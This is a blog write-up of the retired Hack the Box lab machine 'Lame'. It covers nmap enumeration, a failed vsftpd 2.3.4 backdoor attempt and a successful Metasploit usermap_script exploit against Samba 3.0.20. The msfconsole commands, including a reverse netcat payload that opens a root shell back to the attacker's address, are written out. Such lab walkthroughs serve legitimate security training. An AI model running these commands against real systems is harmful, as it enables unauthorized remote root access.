
Hack the Box Writeup - Lame

As my last guide was unexpectedly popular (thanks mostly to a retweet by @hackthebox_eu), I figured I should get on and write another one, this time for the Hack the Box retired machine Lame.

Note: You can find my guide to Shocker here and my guide to Beep here.

Enumeration

So we begin, as always, with our initial nmap scan.

$ nmap -sC -sV -p- -oA nmap/initial 10.10.10.3

First look shows an FTP service that allows anonymous login, so let's take a peek and see what we can find.

[Screenshot: anonymous FTP login]

Which unfortunately appears to be nothing :(

However, the nmap scan revealed that the FTP software is vsftpd 2.3.4. A quick searchsploit shows that this version has a backdoor command execution vulnerability. Let's see if we can take advantage of it.

[Screenshot: searchsploit vsftpd 2.3.4]

Looking at further information about this exploit shows it is a Metasploit module, so let's fire up msfconsole and give it a whirl.

[Screenshot: vsftpd_234_backdoor module failing]

Lame indeed. vsftpd 2.3.4 does carry the backdoor (a username containing ":)" makes the trojaned daemon open a shell on port 6200, which is what the Metasploit module then connects to), but here the module fails. Either this particular build has been patched, or port 6200 simply isn't reachable from us; either way, let's go back to our nmap scan and look for other attack vectors.

Our next likely candidate for attack presents itself, as the ports for Samba are open. These are always good to have a poke at given the history of security issues that have come up with Samba over the years.

[Screenshot: nmap output showing the Samba version]

Nmap has a number of scripts we can run to check for Samba vulnerabilities, so that's what we will try first.

$ nmap --script "smb-vuln*" --script-args=unsafe=1 -p 445 10.10.10.3

Unfortunately this also fails to find anything (those scripts check for a fixed list of specific CVEs, so a miss here doesn't mean Samba is clean). However, taking the Samba version from our initial nmap scan (3.0.20) and running it through searchsploit presents us with another likely candidate.

[Screenshot: searchsploit Samba 3.0.20]

The second entry is a remote heap overflow, so unlikely to help us here, but the first one looks more promising. It's another Metasploit module, so let's fire up msfconsole again and give it a go.

Exploit

We run the following:

> use exploit/multi/samba/usermap_script
> set rhost 10.10.10.3
> set payload cmd/unix/reverse_netcat
> set lhost 10.10.14.15
> exploit

And straight away we get a root shell (smbd runs as root, so the injected command does too), along with access to both flags :)

[Screenshot: root shell on Lame]

Dean Williams

OSCP, Application Developer, Database Administrator, Wannabe Snowboarder & Imposter Syndrome Sufferer